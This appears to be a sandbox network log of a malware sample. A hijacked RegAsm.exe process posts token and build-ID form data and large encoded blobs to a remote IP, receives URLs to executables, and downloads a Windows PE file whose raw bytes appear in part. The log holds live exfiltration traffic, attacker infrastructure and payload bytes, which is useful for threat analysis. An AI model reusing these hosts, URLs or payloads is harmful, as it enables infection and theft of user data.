2024-09-26 18:14:55 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDBKKFHIEGDHJKECAAK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:55 UTC	461	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 35 62 33 34 34 37 64 37 62 63 62 62 63 32 65 38 39 37 66 30 64 32 64 30 32 34 32 39 30 38 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------BGDBKKFHIEGDHJKECAAKContent-Disposition: form-data; name="token"355b3447d7bcbbc2e897f0d2d0242908------BGDBKKFHIEGDHJKECAAKContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------BGDBKKFHIEGDHJKECAAKCont
2024-09-26 18:14:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:14:56 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49737	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:57 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKKEGIDBGHIDGDHDBFH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 113457 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:57 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 35 62 33 34 34 37 64 37 62 63 62 62 63 32 65 38 39 37 66 30 64 32 64 30 32 34 32 39 30 38 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="token"355b3447d7bcbbc2e897f0d2d0242908------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------BKKKEGIDBGHIDGDHDBFHCont
2024-09-26 18:14:57 UTC	16355	OUT	Data Raw: 32 4c 71 56 59 51 70 76 53 4d 64 6b 76 7a 39 54 30 69 79 30 6a 54 64 4e 6b 6b 65 78 73 4c 61 32 65 54 37 35 69 6a 43 6b 2f 6c 32 72 7a 62 34 69 66 38 6a 70 42 2f 32 44 6c 2f 39 47 50 58 6f 6d 68 47 36 62 53 59 6d 76 57 76 47 6e 4a 62 50 32 78 49 6b 6c 48 4a 78 6b 52 66 4c 2b 56 65 64 2f 45 54 2f 6b 64 49 50 2b 77 63 76 2f 6f 78 36 36 63 49 6b 73 52 53 53 2f 6d 52 7a 59 6d 63 70 34 58 45 53 6b 37 76 6b 66 36 48 4e 30 6c 4c 52 58 32 35 2b 59 69 55 55 74 4a 54 41 78 39 49 73 59 39 53 31 57 33 74 4a 72 71 47 31 69 6b 62 39 35 4e 4d 34 52 55 58 75 63 6e 6a 4f 4f 67 72 30 6e 55 74 5a 30 4c 78 4a 5a 61 68 34 58 53 35 74 37 57 33 73 49 30 2f 73 32 35 6c 6d 43 70 49 79 44 61 51 57 4a 78 7a 6e 41 39 52 6b 31 78 6d 69 2b 46 66 37 59 31 69 43 77 2b 32 65 54 35 32 37 Data Ascii: 2LqVYQpvSMdkvz9T0iy0jTdNkkexsLa2eT75ijCk/l2rzb4if8jpB/2Dl/9GPXomhG6bSYmvWvGnJbP2xIklHJxkRfL+Ved/ET/kdIP+wcv/ox66cIksRSS/mRzYmcp4XESk7vkf6HN0lLRX25+YiUUtJTAx9IsY9S1W3tJrqG1ikb95NM4RUXucnjOOgr0nUtZ0LxJZah4XS5t7W3sI0/s25lmCpIyDaQWJxznA9Rk1xmi+Ff7Y1iCw+2eT527
2024-09-26 18:14:57 UTC	16355	OUT	Data Raw: 56 69 56 47 75 66 50 43 57 7a 57 69 73 36 6b 76 4a 64 51 4a 4b 6b 53 44 6c 6e 49 64 53 41 41 41 54 57 64 42 72 48 39 73 61 30 6c 77 74 6a 62 51 32 62 36 35 70 74 72 41 67 67 52 64 30 44 65 61 47 33 41 41 44 4c 37 51 57 34 78 32 36 41 56 64 6b 61 37 56 5a 46 74 58 74 77 73 79 65 58 4b 73 39 74 48 4d 72 72 6b 48 42 44 71 77 78 6b 44 74 32 46 5a 39 7a 5a 61 68 4e 50 44 4c 46 63 57 31 71 30 55 30 4e 77 6f 74 37 57 4b 4e 66 4d 69 33 62 47 32 71 67 48 47 39 75 33 4f 65 63 34 46 63 47 4d 77 31 65 70 55 35 6f 4c 54 54 38 31 66 38 44 31 63 75 78 6d 47 6f 30 65 57 71 39 58 66 70 74 32 48 53 36 70 64 2f 62 64 4c 67 6d 74 4e 4e 75 39 51 6b 76 4a 6f 70 59 4e 4f 4d 4c 4b 62 64 69 71 6f 43 59 76 6b 45 6d 53 35 48 63 59 42 4e 53 6d 53 54 2b 32 6a 6f 45 53 77 79 52 53 57 Data Ascii: ViVGufPCWzWis6kvJdQJKkSDlnIdSAAATWdBrH9sa0lwtjbQ2b65ptrAggRd0DeaG3AADL7QW4x26AVdka7VZFtXtwsyeXKs9tHMrrkHBDqwxkDt2FZ9zZahNPDLFcW1q0U0Nwot7WKNfMi3bG2qgHG9u3Oec4FcGMw1epU5oLTT81f8D1cuxmGo0eWq9Xfpt2HS6pd/bdLgmtNNu9QkvJopYNOMLKbdiqoCYvkEmS5HcYBNSmST+2joESwyRSW
2024-09-26 18:14:57 UTC	16355	OUT	Data Raw: 73 64 65 31 55 57 57 6f 52 4e 4a 44 73 5a 77 46 63 71 63 6a 33 46 5a 56 62 76 68 4b 37 74 37 4c 58 42 4e 63 7a 4c 44 45 49 6d 42 63 39 73 69 76 4d 78 79 62 77 38 30 75 78 34 57 57 38 76 31 75 6e 7a 62 58 4d 36 61 78 38 4b 78 65 4b 56 30 54 2b 78 47 66 64 63 70 42 35 38 65 70 4d 77 47 34 67 5a 78 74 36 6a 50 49 7a 31 47 4b 34 6a 78 6c 61 44 53 66 46 75 6f 32 46 68 47 71 32 73 45 67 57 4d 4d 53 78 78 74 48 66 50 72 6d 76 54 76 44 4f 6c 2b 48 4e 4d 53 5a 39 53 76 49 4a 37 78 4c 73 53 51 7a 67 73 54 74 55 68 6c 49 34 34 79 63 35 46 63 62 34 72 30 73 36 72 34 70 31 47 2b 74 35 6c 4d 4d 30 75 35 44 6a 71 4d 43 76 6d 4a 34 4f 56 53 58 4c 52 68 74 2f 58 55 2b 74 78 46 62 44 30 71 66 4e 4e 72 56 2b 58 6e 32 4f 48 55 7a 4f 52 35 6d 33 41 4f 65 42 55 34 64 77 4d 42 Data Ascii: sde1UWWoRNJDsZwFcqcj3FZVbvhK7t7LXBNczLDEImBc9sivMxybw80ux4WW8v1unzbXM6ax8KxeKV0T+xGfdcpB58epMwG4gZxt6jPIz1GK4jxlaDSfFuo2FhGq2sEgWMMSxxtHfPrmvTvDOl+HNMSZ9SvIJ7xLsSQzgsTtUhlI44yc5Fcb4r0s6r4p1G+t5lMM0u5DjqMCvmJ4OVSXLRht/XU+txFbD0qfNNrV+Xn2OHUzOR5m3AOeBU4dwMB
2024-09-26 18:14:57 UTC	16355	OUT	Data Raw: 33 6a 39 61 68 4e 54 53 6e 35 6a 55 52 34 72 30 75 69 4f 2b 47 77 30 38 30 30 38 2f 53 6e 65 76 38 36 61 63 43 70 4e 42 4d 59 70 4f 6c 42 36 38 30 48 6a 38 71 51 77 50 54 76 54 65 63 55 76 65 6b 49 35 71 52 69 44 2b 58 65 6b 36 6a 47 61 58 32 70 44 2f 6b 30 46 41 65 6e 39 61 51 38 5a 6f 2f 6e 53 64 65 39 49 59 48 70 53 48 70 2f 6a 53 2b 76 70 6d 6b 6f 47 4a 6e 46 48 70 30 6f 39 4b 44 31 2f 70 53 47 46 49 54 36 2f 6c 52 69 6a 70 7a 51 42 36 48 52 52 52 57 52 38 6b 46 46 62 6e 68 4f 4e 4a 4e 62 43 4f 6f 5a 54 47 33 42 48 30 72 75 78 70 39 6b 6f 79 34 49 79 66 54 70 2b 6c 65 48 6a 38 35 65 45 78 48 73 46 43 2b 6c 39 37 66 6f 7a 33 38 74 79 4c 36 37 51 39 74 37 54 6c 31 74 74 66 39 55 65 55 55 56 36 76 39 69 74 78 79 6f 66 59 65 6a 69 4d 4f 44 2f 33 7a 56 62 Data Ascii: 3j9ahNTSn5jUR4r0uiO+Gw08008/Snev86acCpNBMYpOlB680Hj8qQwPTvTecUvekI5qRiD+Xek6jGaX2pD/k0FAen9aQ8Zo/nSde9IYHpSHp/jS+vpmkoGJnFHp0o9KD1/pSGFIT6/lRijpzQB6HRRRWR8kFFbnhONJNbCOoZTG3BH0ruxp9koy4IyfTp+leHj85eExHsFC+l97foz38tyL67Q9t7Tl1ttf9UeUUV6v9itxyofYejiMOD/3zVb
2024-09-26 18:14:57 UTC	16355	OUT	Data Raw: 4b 4b 4b 41 45 6f 6f 6f 6f 41 4b 4f 31 46 46 41 43 55 55 55 55 44 43 6b 35 6f 37 30 55 77 43 69 69 69 67 41 6f 6f 4e 4a 51 4d 4b 4b 4b 4b 41 43 6b 6f 6f 6f 41 4b 4b 4b 44 51 4d 44 53 55 55 55 41 46 46 4a 52 51 4d 4b 4b 4b 53 67 59 55 6c 4c 53 55 41 46 46 46 46 41 78 4b 4b 57 6b 4e 41 42 52 52 52 51 4d 53 69 69 69 6d 41 6c 46 46 46 41 78 42 52 52 7a 52 51 41 55 6c 4c 52 51 41 6c 46 46 46 41 78 4f 39 42 6f 70 4b 42 68 53 55 74 4a 51 4d 4b 53 6c 70 4b 41 43 6b 70 61 53 67 59 55 47 69 6b 6f 47 46 46 46 49 61 41 43 67 6d 69 6b 70 6a 43 69 69 6b 6f 47 46 4a 53 30 30 6d 67 45 46 46 46 49 61 42 69 30 6d 61 4b 54 36 30 78 68 6d 69 6b 4c 43 6d 37 71 59 37 43 6d 67 6b 43 6d 45 2b 74 4a 2b 4e 46 79 72 44 69 31 4e 4a 4a 6f 70 4b 56 78 32 43 6b 6f 6f 6f 4b 45 70 44 52 Data Ascii: KKKAEooooAKO1FFACUUUUDCk5o70UwCiiigAooNJQMKKKKACkoooAKKKDQMDSUUUAFFJRQMKKKSgYUlLSUAFFFFAxKKWkNABRRRQMSiiimAlFFFAxBRRzRQAUlLRQAlFFFAxO9BopKBhSUtJQMKSlpKACkpaSgYUGikoGFFFIaACgmikpjCiikoGFJS00mgEFFFIaBi0maKT60xhmikLCm7qY7CmgkCmE+tJ+NFyrDi1NJJopKVx2CkoooKEpDR
2024-09-26 18:14:57 UTC	15327	OUT	Data Raw: 57 47 4d 44 67 31 77 35 73 62 39 5a 31 74 7a 70 31 38 4a 6e 55 75 73 5a 74 5a 4e 78 55 59 42 49 47 4d 34 47 52 2b 59 71 74 49 54 46 4a 4e 48 49 6b 69 53 51 6a 64 4b 6a 52 6b 4e 47 4f 4f 57 47 4d 6a 71 4f 76 71 4b 79 57 58 34 56 7a 75 6e 70 32 76 2f 41 45 7a 73 65 62 35 67 71 66 4b 34 36 39 37 66 30 6a 66 38 54 61 39 46 72 73 6c 71 38 4d 54 78 65 55 72 42 67 2b 44 6e 4f 4f 6e 35 56 68 5a 70 6a 76 35 55 58 6d 79 4a 49 6b 65 31 57 33 74 47 77 58 44 5a 32 6e 4f 4d 59 4f 44 6a 31 77 61 65 79 74 48 49 30 63 69 4f 6a 72 31 56 31 4b 6b 64 2b 68 72 30 4b 4d 61 64 4f 4b 70 30 33 6f 6a 79 4d 54 4f 74 57 6d 36 74 56 61 76 79 73 4a 52 52 52 57 78 7a 43 30 55 36 47 47 61 34 6d 38 71 33 67 6d 6e 6c 32 37 74 6b 4d 62 4f 32 50 58 41 42 34 70 79 57 39 7a 4c 63 79 57 30 56 Data Ascii: WGMDg1w5sb9Z1tzp18JnUusZtZNxUYBIGM4GR+YqtITFJNHIkiSQjdKjRkNGOOWGMjqOvqKyWX4Vzunp2v/AEzseb5gqfK4697f0jf8Ta9Frslq8MTxeUrBg+DnOOn5VhZpjv5UXmyJIke1W3tGwXDZ2nOMYODj1waeytHI0ciOjr1V1Kkd+hr0KMadOKp03ojyMTOtWm6tVavysJRRRWxzC0U6GGa4m8q3gmnl27tkMbO2PXAB4pyW9zLcyW0V
2024-09-26 18:14:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:14:59 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49738	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:59 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:59 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 35 62 33 34 34 37 64 37 62 63 62 62 63 32 65 38 39 37 66 30 64 32 64 30 32 34 32 39 30 38 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 Data Ascii: ------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="token"355b3447d7bcbbc2e897f0d2d0242908------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------FCFBFHIEBKJKFHIEBFBACont
2024-09-26 18:15:00 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:15:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:15:00 UTC	135	IN	Data Raw: 37 63 0d 0a 4d 54 49 78 4f 54 41 31 4e 6e 78 6f 64 48 52 77 63 7a 6f 76 4c 32 52 69 63 32 31 6c 62 6d 45 75 59 32 39 74 4c 32 78 71 61 47 64 6d 63 32 51 75 5a 58 68 6c 66 44 46 38 61 32 74 72 61 33 77 78 4d 6a 45 35 4d 44 55 33 66 47 68 30 64 48 42 7a 4f 69 38 76 5a 47 4a 7a 62 57 56 75 59 53 35 6a 62 32 30 76 64 6d 52 7a 61 47 5a 6b 4c 6d 56 34 5a 58 77 78 66 47 74 72 61 32 74 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 7cMTIxOTA1NnxodHRwczovL2Ric21lbmEuY29tL2xqaGdmc2QuZXhlfDF8a2tra3wxMjE5MDU3fGh0dHBzOi8vZGJzbWVuYS5jb20vdmRzaGZkLmV4ZXwxfGtra2t80

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49739	172.105.54.160	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:01 UTC	171	OUT	GET /ljhgfsd.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: dbsmena.com Cache-Control: no-cache
2024-09-26 18:15:02 UTC	284	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 18:15:01 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 26 Sep 2024 16:59:48 GMT ETag: "c218c-5e028-62308aa93ecb1" Accept-Ranges: bytes Content-Length: 385064 Content-Type: application/x-msdownload
2024-09-26 18:15:02 UTC	7908	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ec 91 f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b0 05 00 00 08 00 00 00 00 00 00 3e ce 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf> @ `
2024-09-26 18:15:02 UTC	8000	IN	Data Raw: 13 ef d2 a2 82 10 e4 7b 18 b1 3b 98 2a 47 7f 40 7c 65 20 fd 2e a9 40 96 75 f4 7a a2 0d dd d5 19 59 97 3c 4a 80 e4 e6 3b 9d 07 a4 29 69 dd a7 93 7e 44 db f2 c7 f2 fb b3 49 1a e8 f0 62 2e 1c 2f f2 0f a7 c2 d1 41 28 2e de 6a 3a 64 72 a0 99 67 58 1d ae 19 6c 5d 2d a4 25 2c ed ae 41 0e db 5a c3 ec 3b 9b 76 46 db 2b 85 95 f7 dd 6a 6d f5 5f 6d 16 68 d3 9d b5 fb 1d 3a 90 c1 32 23 71 e9 7c 94 30 36 fc 99 f8 aa 24 6d 43 a4 b4 0d e5 22 91 9e 99 f3 99 e9 53 8d 37 87 ea c1 e3 ab 30 d7 33 5d b0 e9 2e c9 a8 85 5b e6 07 06 97 27 d4 5d 18 e8 9e 18 10 0b 1a 47 40 b9 09 22 8f 06 18 ba 1a 01 0b 71 80 63 15 ee 60 a6 f4 c4 86 57 b8 fb c9 5f 52 3c 06 a0 96 59 74 bd d9 e9 f4 85 df 89 25 14 0e bf 0d 47 ca 17 d1 28 0b 73 5f 18 8b e1 01 37 be dc f1 bf 11 d9 84 f4 62 d4 08 c8 44 8c Data Ascii: {;*G@\|e .@uzY<J;)i~DIb./A(.j:drgXl]-%,AZ;vF+jm_mh:2#q\|06$mC"S703].[']G@"qc`W_R<Yt%G(s_7bD
2024-09-26 18:15:02 UTC	8000	IN	Data Raw: 04 f2 f3 42 4b f0 da d7 38 cd 18 14 d2 03 7f 1b cb f1 cf 8e fb f0 d4 ef 03 28 13 e9 2c 87 fa 8a 86 3e 1d 87 9f 5d f7 94 00 33 ed 3a 49 f6 49 f5 d9 b6 69 62 bc 77 3e 12 bb 48 4f 3d 43 7a 74 a8 b7 05 e9 88 fd 24 82 47 03 83 bd 8b d7 17 5c 79 de 65 be df 3a 01 25 d1 cd 00 93 4a b3 8d 9a eb 0e cf af c0 24 05 b4 c2 95 d7 4f ab fa 0d b7 bd 2d f5 86 30 40 14 52 b9 ae 2b 86 a0 c0 66 6e 57 e6 a2 6d 06 73 ff ce e2 c0 93 ba 43 bb 24 20 01 2d 49 a4 24 d3 98 27 9d 0f 37 6c f9 82 31 f3 02 ab c7 d1 99 c1 85 92 50 8c bc c6 51 27 bf e3 f8 73 30 66 df 44 71 94 ab cb aa 0d d6 b9 89 9c 85 37 54 f2 46 a1 91 3c 2b cf 06 93 8c 5d f3 62 ee 62 2e f5 43 7f b6 f9 8d ac 9f 05 e8 a8 78 42 92 a0 9a a1 38 f1 7d 3a 03 46 20 16 7c f4 78 26 56 23 63 c6 88 37 65 8f 38 24 b2 af bb 2c 96 c8 Data Ascii: BK8(,>]3:IIibw>HO=Czt$G\ye:%J$O-0@R+fnWmsC$ -I$'7l1PQ's0fDq7TF<+]bb.CxB8}:F \|x&V#c7e8$,
2024-09-26 18:15:02 UTC	8000	IN	Data Raw: c3 65 84 87 a2 af fb f7 e6 c8 0e e6 86 18 4b aa 8b 5f 54 d7 43 e8 94 03 b8 52 bc 83 5e a0 35 4d cc b1 67 63 f7 bf b5 e1 a2 47 e2 b2 a5 d7 79 db 4f 8b 53 5d 39 81 b3 9b 8b 90 a6 5d 48 0c f5 42 19 6d 59 ea dd 51 50 fe 01 4c 7d 60 e5 44 74 e5 d5 f3 bd 20 69 54 d6 95 c7 fa ec b1 b0 97 d4 5d c6 d1 0d f3 01 0d 0b 7a 9a e1 85 56 07 8c 0d 32 30 36 d8 71 c1 55 e4 47 cd 9b 2d ff 07 17 9b d0 63 61 06 b4 76 71 a6 aa fe b8 24 6f e4 b9 6e 21 73 27 34 87 33 35 7d 89 ae ec 37 8b 64 34 e9 31 cc 0e e7 e1 7b 7e d8 1b 8e 39 90 35 94 c8 dd c6 4f 63 ec 2c bb db 61 69 8a 2a 81 ca f7 a3 9b ea e9 b4 85 b9 54 2a 2a 91 51 5e f2 1f b2 f2 20 22 cf fb 92 bc 7b 2e 35 2f 69 0b e2 2b d1 ed ca 2a 7d b0 96 a7 4f e1 20 ff af 7d 53 a2 0b d2 ea 31 1a 3d d8 b2 42 18 c4 03 e4 3e 96 72 ff cd af Data Ascii: eK_TCR^5MgcGyOS]9]HBmYQPL}`Dt iT]zV206qUG-cavq$on!s'435}7d41{~95Oc,aiTQ^ "{.5/i+}O }S1=B>r
2024-09-26 18:15:02 UTC	8000	IN	Data Raw: 29 e9 67 04 44 cb c0 e1 aa 06 c1 7f 0b 0f 71 8e 31 e2 d8 93 fc f9 79 23 df 84 15 ae 82 af e8 60 50 3c 25 90 b1 b0 4a b3 40 26 0b 02 cf 0c 30 a9 87 06 9b 9c c1 10 fb 73 e8 18 53 60 e6 9a e3 33 92 dc b9 d2 c5 43 89 15 7c 46 02 30 cf 53 7c 77 12 37 27 f1 9f 6e c3 08 0b 59 26 f1 12 9a 7a cb 55 04 87 48 f4 04 13 92 3d 5a 1c 47 b4 81 7c 67 3d 02 c9 06 15 16 fb 78 6b 0c 09 60 09 0d b7 80 68 39 e9 a8 65 c9 b4 9a 90 00 62 6c 9e 41 c7 5e c2 08 c9 46 b9 2f ba a4 76 b6 e6 74 7f e5 90 a2 52 c1 57 7a 8a 1b fd 4d a4 64 bf 25 78 5f aa 9b 76 e7 af 99 23 46 51 12 2a 85 a7 6e 22 e8 86 00 4b 57 63 fe 1d b7 20 8d 06 19 5d dd 27 80 6b a2 39 24 8d 40 d3 8f 38 70 1f 2a 01 2e b2 fe 92 a8 1a c5 f8 1f f6 74 c2 1f 9b 15 3b 94 22 4e 5d 60 5b 48 2a ea 33 b9 88 c5 10 79 87 ae bd bc b7 Data Ascii: )gDq1y#`P<%J@&0sS`3C\|F0S\|w7'nY&zUH=ZG\|g=xk`h9eblA^F/vtRWzMd%x_v#FQn"KWc ]'k9$@8p.t;"N]`[H*3y
2024-09-26 18:15:02 UTC	8000	IN	Data Raw: fc 9b cf 45 f9 61 e3 65 71 bb 52 77 76 f9 01 61 ee 6c cd 55 03 42 b2 92 41 d5 40 03 3b fd a7 8d db df 78 0d 90 2e 78 b9 57 34 64 76 f1 01 aa cf b5 6e ca f8 6f 25 1f 2a d4 72 fb 3d 73 73 e3 97 e0 c2 76 a4 39 f8 54 6f fe 9b 90 3c 0e ec 80 86 fb cb fd 59 6c c9 13 88 d2 a4 66 46 1c c9 52 4c 2e e2 ec 14 0b 41 30 61 3e 98 e2 1d a2 9e b3 80 5b cb df 71 9e 15 c2 d0 08 7c 73 d6 65 14 4f 18 32 5e f9 80 d5 9c 30 88 f2 9e d0 17 4e 99 e7 ca 82 21 dd b1 5c 07 0b c7 dc 19 3f 0f e8 43 c4 cd 96 27 fe 39 59 a2 4e 0d b7 f5 d5 1e 12 49 af f9 e3 d1 e7 1e 68 4a ea 16 47 ba 78 9e c0 e1 46 48 29 6b ac c9 29 40 44 68 6c 40 12 41 f0 db 27 15 a8 b2 0a 56 f9 f6 64 a8 a3 40 c3 16 25 8c 9a 8c 89 ee 0d 10 a8 40 f8 30 9f 71 fb 47 2b bb ca a1 ce b2 aa 46 bc b7 35 85 6b bd 54 8b 8b d9 c9 Data Ascii: EaeqRwvalUBA@;x.xW4dvno%*r=ssv9To<YlfFRL.A0a>[q\|seO2^0N!\?C'9YNIhJGxFH)k)@Dhl@A'Vd@%@0qG+F5kT
2024-09-26 18:15:02 UTC	8000	IN	Data Raw: 4f d2 b1 20 a6 2b ff 92 3e ed d9 5c 12 82 65 d5 20 04 cf 4c 41 62 74 b9 2f c5 8f 60 78 f5 d3 76 cd 3e 1c 42 c9 50 f0 07 55 5b e5 70 c1 aa f1 be c7 58 d8 70 14 e1 b9 bd c9 ca e1 52 f3 a7 0c 8e 69 9e cd d8 ed fa 0f 90 57 ec 80 9c 44 57 df ea e7 70 4d d4 27 b0 9b 62 7e 0e ff e5 2c 65 0f 5c d7 bf c7 2a 9b 09 7b 72 0c 9b fe b1 ef 88 05 e1 9d 66 1e 8d cc 9a 4d 93 bb 36 ba 70 31 3c 66 2e e5 46 1d f5 0b eb b2 0c 30 8e 6b e5 37 14 20 6a d9 1d 3a 92 1e 24 d7 b7 33 e3 9d a1 32 1d fd 69 4a c6 07 9f ca bb 17 d8 97 26 e5 cb 1e 18 42 f3 0b cc 5f 89 14 b5 62 99 54 09 5d 0f 66 77 1e 5d 37 d3 99 42 84 49 e2 45 56 1e 63 c0 77 3c ce d1 9d 4a 28 3d b2 35 72 38 e9 ab 3e 5c ee 95 cb df 16 75 4d 1d 42 77 8a 94 fe 42 0d bc df bc 91 6f 0a b5 c7 1d 44 05 fd 00 64 9f 87 00 eb a3 db Data Ascii: O +>\e LAbt/`xv>BPU[pXpRiWDWpM'b~,e\*{rfM6p1<f.F0k7 j:$32iJ&B_bT]fw]7BIEVcw<J(=5r8>\uMBwBoDd
